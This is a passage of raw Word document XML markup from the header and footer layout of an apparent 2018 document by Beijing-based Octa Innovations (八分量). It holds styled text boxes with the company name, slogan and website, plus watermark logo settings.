                              <w:rFonts w:ascii="Avenir Heavy Oblique" w:eastAsia="微软雅黑" w:hAnsi="Avenir Heavy Oblique" w:hint="eastAsia"/>
                              <w:b/>
                              <w:i/>
                              <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
                              <w:sz w:val="22"/>
                              <w:szCs w:val="26"/>
                            </w:rPr>
                            <w:t>持续免疫</w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:ascii="Avenir Heavy Oblique" w:eastAsia="微软雅黑" w:hAnsi="Avenir Heavy Oblique"/>
                              <w:b/>
                              <w:i/>
                              <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
                              <w:sz w:val="22"/>
                              <w:szCs w:val="26"/>
                            </w:rPr>
                            <w:t>系统</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2243F183" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="_x0000_s1039" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:345.9pt;margin-top:34.25pt;width:93.35pt;height:2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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="581755E9" w14:textId="42ABADA1" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Avenir Heavy Oblique" w:eastAsia="微软雅黑" w:hAnsi="Avenir Heavy Oblique"/>
                        <w:b/>
                        <w:i/>
                        <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
                        <w:sz w:val="22"/>
                        <w:szCs w:val="26"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Avenir Heavy Oblique" w:eastAsia="微软雅黑" w:hAnsi="Avenir Heavy Oblique" w:hint="eastAsia"/>
                        <w:b/>
                        <w:i/>
                        <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
                        <w:sz w:val="22"/>
                        <w:szCs w:val="26"/>
                      </w:rPr>
                      <w:t>持续免疫</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Avenir Heavy Oblique" w:eastAsia="微软雅黑" w:hAnsi="Avenir Heavy Oblique"/>
                        <w:b/>
                        <w:i/>
                        <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
                        <w:sz w:val="22"/>
                        <w:szCs w:val="26"/>
                      </w:rPr>
                      <w:t>系统</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1984BA1" wp14:editId="0B2E7C9E">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-1254760</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>950595</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="7994015" cy="134620"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="120" name="矩形 12"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="7994015" cy="134620"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:gradFill flip="none" rotWithShape="1">
                        <a:gsLst>
                          <a:gs pos="0">
                            <a:srgbClr val="5ABACF"/>
                          </a:gs>
                          <a:gs pos="99000">
                            <a:srgbClr val="479BAD"/>
                          </a:gs>
                        </a:gsLst>
                        <a:lin ang="0" scaled="1"/>
                        <a:tileRect/>
                      </a:gra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F2A54B" id="矩形 12" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-98.8pt;margin-top:74.85pt;width:629.45pt;height:10.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" fillcolor="#5abacf" stroked="f" strokeweight="2pt">
              <v:fill color2="#479bad" rotate="t" angle="90" colors="0 #5abacf;64881f #479bad" focus="100%" type="gradien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22C1F" w14:textId="77777777" w:rsidR="00751612" w:rsidRDefault="00751612">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="61510C0C" w14:textId="77777777" w:rsidR="00751612" w:rsidRDefault="00751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278BF" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00751612">
    <w:pPr>
      <w:pStyle w:val="aa"/>
    </w:pPr>
    <w:r>
      <w:pict w14:anchorId="62CEE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1029" o:spid="_x0000_s2050" type="#_x0000_t75" alt="八分量Logo2" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:585.85pt;height:440.65pt;z-index:-251654144;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin;mso-width-relative:page;mso-height-relative:page" o:allowincell="f">
          <v:imagedata r:id="rId1" o:title="八分量Logo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CC4F4" w14:textId="3E70F42B" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">
    <w:pPr>
      <w:pStyle w:val="aa"/>
      <w:pBdr>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:pBdr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E53E9FE" wp14:editId="44447CFB">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>4372610</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-63500</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1677670" cy="405765"/>
              <wp:effectExtent l="0" t="0" r="0" b="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318C7AE5" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002271CE">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75536473" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002271CE">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wps:txbx>
                    <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shapetype w14:anchorId="0E53E9FE" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="文本框 2" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:344.3pt;margin-top:-5pt;width:132.1pt;height:31.95pt;z-index:-2516449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" filled="f" stroked="f">
              <v:textbox>
                <w:txbxContent>
                  <w:p w14:paraId="318C7AE5" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002271CE">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75536473" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002271CE">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v:textbox>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="749D30CA" wp14:editId="4D659BCF">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-91440</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-94615</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1677670" cy="405765"/>
              <wp:effectExtent l="0" t="0" r="0" b="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39C7B164" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002271CE">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3CED2052" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002271CE">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wps:txbx>
                    <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shape w14:anchorId="749D30CA" id="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-7.2pt;margin-top:-7.45pt;width:132.1pt;height:31.95pt;z-index:-251646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" filled="f" stroked="f">
              <v:textbox>
                <w:txbxContent>
                  <w:p w14:paraId="39C7B164" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002271CE">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3CED2052" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002271CE">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6B1BF" w14:textId="17DEF705" w:rsidR="00A5661A" w:rsidRDefault="00751612" w:rsidP="00051846">
    <w:pPr>
      <w:pStyle w:val="aa"/>
      <w:pBdr>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:pBdr>
    </w:pPr>
    <w:r>
      <w:pict w14:anchorId="347D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1028" o:spid="_x0000_s2049" type="#_x0000_t75" alt="八分量Logo2" style="position:absolute;left:0;text-align:left;margin-left:-19.9pt;margin-top:82.8pt;width:510pt;height:383.6pt;z-index:-251653120;mso-position-horizontal-relative:margin;mso-position-vertical-relative:margin;mso-width-relative:page;mso-height-relative:page" o:allowincell="f">
          <v:imagedata r:id="rId1" o:title="八分量Logo2" gain="13107f" blacklevel="26214f"/>
          <w10:wrap anchorx="margin" anchory="margin"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r w:rsidR="00A5661A">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251650048" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5023ED02" wp14:editId="60167895">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-91440</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-94787</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1677670" cy="405765"/>
              <wp:effectExtent l="0" t="0" r="0" b="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1E3D3D14" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">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2E5CD779" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">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wps:txbx>
                    <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shapetype w14:anchorId="5023ED02" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-7.2pt;margin-top:-7.45pt;width:132.1pt;height:31.9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" filled="f" stroked="f">
              <v:textbox>
                <w:txbxContent>
                  <w:p w14:paraId="1E3D3D14" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">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2E5CD779" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">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v:textbox>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r w:rsidR="00A5661A">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251651072" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2050A881" wp14:editId="591CD840">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>4372610</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-63963</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1677670" cy="405765"/>
              <wp:effectExtent l="0" t="0" r="0"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3862D4AC" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">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4285A5BF" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">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wps:txbx>
                    <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shape w14:anchorId="2050A881" id="_x0000_s1031" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:344.3pt;margin-top:-5.05pt;width:132.1pt;height:31.9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" filled="f" stroked="f">
              <v:textbox>
                <w:txbxContent>
                  <w:p w14:paraId="3862D4AC" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">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4285A5BF" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">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74C65" w14:textId="2390F266" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">
    <w:pPr>
      <w:pStyle w:val="aa"/>
      <w:pBdr>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:pBdr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0AB00B66" wp14:editId="6CD94321">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>3947022</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-313166</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1677670" cy="405765"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="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41BF1DB0" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002917CD">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5BE2B6F0" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002917CD">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wps:txbx>
                    <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shapetype w14:anchorId="0AB00B66" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="_x0000_s1032" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:310.8pt;margin-top:-24.65pt;width:132.1pt;height:31.95pt;z-index:-251649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" filled="f" stroked="f">
              <v:textbox>
                <w:txbxContent>
                  <w:p w14:paraId="41BF1DB0" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002917CD">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用科技</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                      </w:rPr>
                      <w:t>构筑可信云生态</w:t>
                    </w:r>
                  </w:p>
                  <w:p w14:paraId="5BE2B6F0" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002917CD">
                    <w:pPr>
                      <w:pStyle w:val="aa"/>
                      <w:pBdr>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:pBdr>
                      <w:spacing w:line="240" w:lineRule="exact"/>
                      <w:jc w:val="right"/>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                      </w:rPr>
                      <w:t>www.8lab.cn</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1632E2BD" wp14:editId="3D7A5F21">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-557599</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-305556</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1677670" cy="405765"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="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05765"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="9525">
                        <a:noFill/>
                        <a:miter lim="800000"/>
                      </a:ln>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="529EFBCD" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002917CD">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382EC762" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002917CD">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wps:txbx>
                    <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shape w14:anchorId="1632E2BD" id="_x0000_s1033" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-43.9pt;margin-top:-24.05pt;width:132.1pt;height:31.95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" filled="f" stroked="f">
              <v:textbox>
                <w:txbxContent>
                  <w:p w14:paraId="529EFBCD" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002917CD">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北京八分量信息科技有限公司</w:t>
                    </w:r>
                  </w:p>
                  <w:p w14:paraId="382EC762" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002917CD">
                    <w:pPr>
                      <w:pStyle w:val="aa"/>
                      <w:pBdr>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:pBdr>
                      <w:spacing w:line="240" w:lineRule="exact"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                      </w:rPr>
                      <w:t>O</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                      </w:rPr>
                      <w:t>cta Innovations</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E672DAE" wp14:editId="2EDF25EF">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-1132205</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-564515</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7574280" cy="10701020"/>
          <wp:effectExtent l="0" t="0" r="0" b="571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4411" cy="10700952"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251656192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0FEC57C2" wp14:editId="78EF5B8E">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="margin">
                <wp:posOffset>219710</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="margin">
                <wp:posOffset>9735820</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5747385" cy="564515"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="121" name="组合 17"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                  <wpg:wgp>
                    <wpg:cNvGrpSpPr/>
                    <wpg:grpSpPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5747385" cy="564515"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="57476" cy="5647"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:nvPicPr>
                        <pic:cNvPr id="122" name="图形 33"/>
                        <pic:cNvPicPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId2">
                          <a:extLst>
                            <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                              <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                            </a:ext>
                          </a:extLst>
                        </a:blip>
                        <a:srcRect/>
                        <a:stretch>
                          <a:fillRect/>
                        </a:stretch>
                      </pic:blipFill>
                      <pic:spPr>
                        <a:xfrm>
                          <a:off x="0" y="831"/>
                          <a:ext cx="9023" cy="3981"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                      </pic:spPr>
                    </pic:pic>
                    <wpg:grpSp>
                      <wpg:cNvPr id="124" name="组合 34"/>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="51538" y="0"/>
                          <a:ext cx="5938" cy="5647"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="10194" cy="5647"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="127" name="Text Box 6"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="10103" cy="3683"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1C27BBCB" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">
                              <w:pPr>
                                <w:adjustRightInd w:val="0"/>
                                <w:snapToGrid w:val="0"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                                  <w:b/>
                                  <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                                  <w:b/>
                                  <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                                <w:t>2018</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0" upright="1">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="512" name="Text Box 7"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="46" y="2599"/>
                            <a:ext cx="10148" cy="3048"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3B5C1591" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">
                              <w:pPr>
                                <w:rPr>
                                  <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                                  <w:b/>
                                  <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
                                  <w:sz w:val="26"/>
                                  <w:szCs w:val="26"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                                  <w:b/>
                                  <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
                                  <w:sz w:val="26"/>
                                  <w:szCs w:val="26"/>
                                </w:rPr>
                                <w:t>07 / 04</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0" upright="1">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:grpSp>
                  </wpg:wgp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:group w14:anchorId="0FEC57C2" id="组合 17" o:spid="_x0000_s1034" style="position:absolute;left:0;text-align:left;margin-left:17.3pt;margin-top:766.6pt;width:452.55pt;height:44.45pt;z-index:251656192;mso-position-horizontal-relative:margin;mso-position-vertical-relative:margin" coordsize="57476,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33" o:spid="_x0000_s1035" type="#_x0000_t75" style="position:absolute;top:831;width:9023;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MInBAAAA3AAAAA8AAABkcnMvZG93bnJldi54bWxET02LwjAQvS/4H8II3tbUIotU06KCIHhx&#10;Vdbr2IxttZmUJmr1128WhL3N433OLOtMLe7UusqygtEwAkGcW11xoeCwX31OQDiPrLG2TAqe5CBL&#10;ex8zTLR98Dfdd74QIYRdggpK75tESpeXZNANbUMcuLNtDfoA20LqFh8h3NQyjqIvabDi0FBiQ8uS&#10;8uvuZhTkix8sXsdue4jnl2oxws14709KDfrdfArCU+f/xW/3Wof5cQx/z4QLZPo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WMInBAAAA3AAAAA8AAAAAAAAAAAAAAAAAnwIA&#10;AGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPcAAACNAwAAAAA=&#10;">
                <v:imagedata r:id="rId3" o:title=""/>
              </v:shape>
              <v:group id="组合 34" o:spid="_x0000_s1036" style="position:absolute;left:51538;width:5938;height:5647" coordsize="10194,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6" o:spid="_x0000_s1037" type="#_x0000_t202" style="position:absolute;width:10103;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1C27BBCB" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">
                        <w:pPr>
                          <w:adjustRightInd w:val="0"/>
                          <w:snapToGrid w:val="0"/>
                          <w:rPr>
